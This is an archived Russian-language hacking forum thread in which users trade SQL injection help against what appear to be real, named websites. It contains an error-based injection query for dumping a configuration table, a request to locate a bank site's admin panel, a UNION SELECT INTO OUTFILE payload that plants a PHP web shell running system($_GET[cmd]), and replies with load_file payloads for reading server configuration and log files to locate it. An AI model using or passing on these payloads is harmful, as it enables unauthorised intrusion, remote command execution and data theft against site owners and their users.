HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1499 из 2422 « Первая < 499999139914491489 1495 1496 1497 1498 1499 1500 1501 1502 1503 1509154915991999 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.10.2010, 18:37
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию
Хм.. при таком запросе,

Код:
1' or (select count(*) from information_schema.tables group by concat((select concat_ws(0x3a,id,name,value,comments) from bla.configuration limit 0,1),floor(rand(0)*2)))/*
тоже выдает

Subquery returns more than 1 row

С чем это может быть связано? ..таблица configuration единственная.
 
Ответить с цитированием

  #2  
Старый 12.10.2010, 18:45
ubi
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме:
278340

Репутация: 0
По умолчанию
Помогите найти админку

http://www.zembank.ru/

В ПМ пожалуйста
 
Ответить с цитированием

  #3  
Старый 12.10.2010, 23:17
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию
Цитата:
Сообщение от None  
Access denied for user 'u1001104_spark'@'%' to database 'information_schema'
takoe mozhet byt'?
 
Ответить с цитированием

  #4  
Старый 13.10.2010, 01:34
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию
Цитата:
Сообщение от j0ker13  
takoe mozhet byt'?
а что в этом не понятного? нету прав на information_schema
 
Ответить с цитированием

  #5  
Старый 13.10.2010, 10:21
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
По умолчанию
подскажите, тут просто ошибка mysql или можно что-то выкружить:

http://jmatch.com/member/profile.php?profile_id=21295740'
 
Ответить с цитированием

  #6  
Старый 13.10.2010, 19:31
0pTik
Участник форума
Регистрация: 18.07.2010
Сообщений: 240
Провел на форуме:
43982

Репутация: 17
По умолчанию
Заливаю шелл

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+UNION+SELECT+1,%27%3C?%20system%28$_GET[cmd]%29;%20?%3E%27,3,4,5%20from%20mysql.user%20into+outfile+%271.php%27

[/COLOR][/COLOR
-- и никак не могу найти его ))
 
Ответить с цитированием

  #7  
Старый 13.10.2010, 20:05
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию
Путь нужно указывать абсолютный. Папка, в которую пишешь, должна быть доступна для записи.
 
Ответить с цитированием

  #8  
Старый 13.10.2010, 20:40
0pTik
Участник форума
Регистрация: 18.07.2010
Сообщений: 240
Провел на форуме:
43982

Репутация: 17
По умолчанию
Спасибо буду думать как мне путь узнать
 
Ответить с цитированием

  #9  
Старый 13.10.2010, 23:21
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию
Цитата:
Сообщение от 0pTik  
Спасибо буду думать как мне путь узнать
Раз file_priv есть, то ищи конфиг апача. Там будет полный путь до твоего ресурса.
 
Ответить с цитированием

  #10  
Старый 14.10.2010, 00:10
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
По умолчанию
Цитата:
Сообщение от 0pTik  
Заливаю шелл
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+UNION+SELECT+1,%27%3C?%20system%28$_GET[cmd]%29;%20?%3E%27,3,4,5%20from%20mysql.user%20into+outfile+%271.php%27

[/COLOR][/COLOR
-- и никак не могу найти его ))
http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+and+1=0+Union+Select+1,load_file('/var/log/apache2/error_log'),3,4,5

http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+and+1=0+Union+Select+1,load_file('/etc/apache2/httpd.conf'),3,4,5

http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+and+1=0+Union+Select+1,load_file('/etc/apache2/default-server.conf'),3,4,5
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием
Ответ
Страница 1499 из 2422 « Первая < 499999139914491489 1495 1496 1497 1498 1499 1500 1501 1502 1503 1509154915991999 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.